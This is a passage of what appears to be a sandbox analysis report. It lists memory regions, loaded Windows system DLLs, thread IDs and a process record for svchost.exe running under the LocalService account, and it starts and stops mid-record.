"" Region: id = 2758 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2775 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3110 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3111 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 3112 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3113 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 3114 start_va = 0x7fffaada0000 end_va = 0x7fffaadaefff monitored = 0 entry_point = 0x7fffaada2c50 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 3207 start_va = 0xa40000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 3208 start_va = 0xac0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3209 start_va = 0x7fffaf260000 end_va = 0x7fffaf270fff monitored = 0 entry_point = 0x7fffaf266710 region_type = mapped_file name = "tpmtasks.dll" filename = "\\Windows\\System32\\TpmTasks.dll" (normalized: "c:\\windows\\system32\\tpmtasks.dll") Region: id = 3326 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3327 start_va = 0x7fffad4e0000 end_va = 0x7fffad54dfff monitored = 0 entry_point = 0x7fffad52e6c0 region_type = mapped_file name = "tpmcoreprovisioning.dll" filename = "\\Windows\\System32\\TpmCoreProvisioning.dll" (normalized: "c:\\windows\\system32\\tpmcoreprovisioning.dll") Thread: id = 194 os_tid = 0x48c Thread: id = 199 os_tid = 0x59c Thread: id = 256 os_tid = 0x744 Thread: id = 267 os_tid = 0x7d8 Thread: id = 270 os_tid = 0x418 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7467d000" os_pid = "0x3f0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x210" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cf79" [0xc000000f], "LOCAL" [0x7] Region: id = 2465 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2466 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2467 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2468 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2469 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2470 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2471 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2472 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2473 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2474 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2475 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2476 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2477 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2478 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2479 start_va = 0x500000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2480 start_va = 0x580000 end_va = 0x707fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2481 start_va = 0x710000 end_va = 0x711fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 2482 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2483 start_va = 0x750000 end_va = 0x756fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2484 start_va = 0x760000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2485 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2486 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2487 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2488 start_va = 0xa90000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2489 start_va = 0xb50000 end_va = 0xf4afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 2490 start_va = 0x1040000 end_va = 0x1040fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 2491 start_va = 0x1080000 end_va = 0x1086fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 2492 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2493 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2494 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2495 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2496 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 2497 start_va = 0x1700000 end_va = 0x26fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 2498 start_va = 0x2700000 end_va = 0x2a36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2499 start_va = 0x2a70000 end_va = 0x2ab8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 2500 start_va = 0x2ac0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 2501 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2502 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2503 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2504 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2505 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2506 start_va = 0x32f0000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2507 start_va = 0x33f0000 end_va = 0x34effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2508 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2509 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2510 start_va = 0x3700000 end_va = 0x3efffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-18.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-18.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-18.dat") Region: id = 2511 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 2512 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 2513 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2514 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2515 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2516 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2517 start_va = 0x7ff759210000 end_va = 0x7ff75921cfff monitored = 0 entry_point = 0x7ff759213980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2518 start_va = 0x7fffa9ad0000 end_va = 0x7fffa9addfff monitored = 0 entry_point = 0x7fffa9ad1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2519 start_va = 0x7fffa9c50000 end_va = 0x7fffa9cdafff monitored = 0 entry_point = 0x7fffa9c6d2a0 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 2520 start_va = 0x7fffaa4b0000 end_va = 0x7fffaa4bcfff monitored = 0 entry_point = 0x7fffaa4b2650 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 2521 start_va = 0x7fffaaf80000 end_va = 0x7fffaaff9fff monitored = 0 entry_point = 0x7fffaafa7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2522 start_va = 0x7fffab150000 end_va = 0x7fffab15bfff monitored = 0 entry_point = 0x7fffab1514d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 2523 start_va = 0x7fffab660000 end_va = 0x7fffab6a9fff monitored = 0 entry_point = 0x7fffab66ac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2524 start_va = 0x7fffab7a0000 end_va = 0x7fffab7d2fff monitored = 0 entry_point = 0x7fffab7ad5a0 region_type = mapped_file name = "biwinrt.dll" filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll") Region: id = 2525 start_va = 0x7fffab7e0000 end_va = 0x7fffab871fff monitored = 0 entry_point = 0x7fffab82a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2526 start_va = 0x7fffab880000 end_va = 0x7fffab8f8fff monitored = 0 entry_point = 0x7fffab897800 region_type = mapped_file name = "geolocation.dll" filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll") Region: id = 2527 start_va = 0x7fffab970000 end_va = 0x7fffab998fff monitored = 0 entry_point = 0x7fffab9824d0 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 2528 start_va = 0x7fffab9a0000 end_va = 0x7fffabb41fff monitored = 0 entry_point = 0x7fffab9ec2d0 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 2529 start_va = 0x7fffabb50000 end_va = 0x7fffabb69fff monitored = 0 entry_point = 0x7fffabb5b670 region_type = mapped_file name = "tzautoupdate.dll" filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll") Region: id = 2530 start_va = 0x7fffadf00000 end_va = 0x7fffadf35fff monitored = 0 entry_point = 0x7fffadf10070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2531 start_va = 0x7fffae7d0000 end_va = 0x7fffae7e7fff monitored = 0 entry_point = 0x7fffae7d5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2532 start_va = 0x7fffb0240000 end_va = 0x7fffb033ffff monitored = 0 entry_point = 0x7fffb0280f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 2533 start_va = 0x7fffb07f0000 end_va = 0x7fffb08e3fff monitored = 0 entry_point = 0x7fffb07fa960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2534 start_va = 0x7fffb0db0000 end_va = 0x7fffb0dcefff monitored = 0 entry_point = 0x7fffb0db5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2535 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2536 start_va = 0x7fffb1650000 end_va = 0x7fffb1663fff monitored = 0 entry_point = 0x7fffb16552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2537 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2538 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2539 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2540 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2541 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2542 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2543 start_va = 0x7fffb3b30000 end_va = 0x7fffb3b37fff monitored = 0 entry_point = 0x7fffb3b31ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2544 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2545 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2546 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2547 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2548 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2549 start_va = 0x7fffb45b0000 end_va = 0x7fffb46f2fff monitored = 0 entry_point = 0x7fffb45d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2550 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2551 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2552 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2553 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2554 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 2555 start_va = 0xf50000 end_va = 0xf7dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 2558 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2559 start_va = 0x7fffab390000 end_va = 0x7fffab457fff monitored = 0 entry_point = 0x7fffab3d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2575 start_va = 0x7fffb40b0000 end_va = 0x7fffb411afff monitored = 0 entry_point = 0x7fffb40c90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2576 start_va = 0x7fffb0f20000 end_va = 0x7fffb0f7bfff monitored = 0 entry_point = 0x7fffb0f36f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2577 start_va = 0x7fffaa360000 end_va = 0x7fffaa397fff monitored = 0 entry_point = 0x7fffaa378cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2578 start_va = 0x7fffaa0a0000 end_va = 0x7fffaa0aafff monitored = 0 entry_point = 0x7fffaa0a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2579 start_va = 0x4300000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2580 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 2581 start_va = 0x7fffb1670000 end_va = 0x7fffb16bafff monitored = 0 entry_point = 0x7fffb16735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2582 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2591 start_va = 0x7fffaa120000 end_va = 0x7fffaa135fff monitored = 0 entry_point = 0x7fffaa1219f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2592 start_va = 0x7fffaa100000 end_va = 0x7fffaa119fff monitored = 0 entry_point = 0x7fffaa102430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2593 start_va = 0x7fffb0190000 end_va = 0x7fffb0239fff monitored = 0 entry_point = 0x7fffb01b7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2595 start_va = 0x7fffa9940000 end_va = 0x7fffa9949fff monitored = 0 entry_point = 0x7fffa99414c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2645 start_va = 0x1300000 end_va = 0x13dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2646 start_va = 0x7fffa9500000 end_va = 0x7fffa9513fff monitored = 0 entry_point = 0x7fffa9501a50 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 2659 start_va = 0x7fffab460000 end_va = 0x7fffab4c0fff monitored = 0 entry_point = 0x7fffab464b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2660 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2661 start_va = 0x7fffa9330000 end_va = 0x7fffa9348fff monitored = 0 entry_point = 0x7fffa9332180 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 2662 start_va = 0x7fffb2380000 end_va = 0x7fffb23c2fff monitored = 0 entry_point = 0x7fffb2394b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2663 start_va = 0x7fffb0090000 end_va = 0x7fffb00b6fff monitored = 0 entry_point = 0x7fffb0097940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2664 start_va = 0x7fffa9310000 end_va = 0x7fffa932dfff monitored = 0 entry_point = 0x7fffa9311690 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 2672 start_va = 0x7fffb0650000 end_va = 0x7fffb0673fff monitored = 0 entry_point = 0x7fffb0653260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3060 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 3147 start_va = 0x7fffaa9a0000 end_va = 0x7fffaa9aafff monitored = 0 entry_point = 0x7fffaa9a1a20 region_type = mapped_file name = "licensemanagersvc.dll" filename = "\\Windows\\System32\\LicenseManagerSvc.dll" (normalized: "c:\\windows\\system32\\licensemanagersvc.dll") Region: id = 3185 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 3186 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point 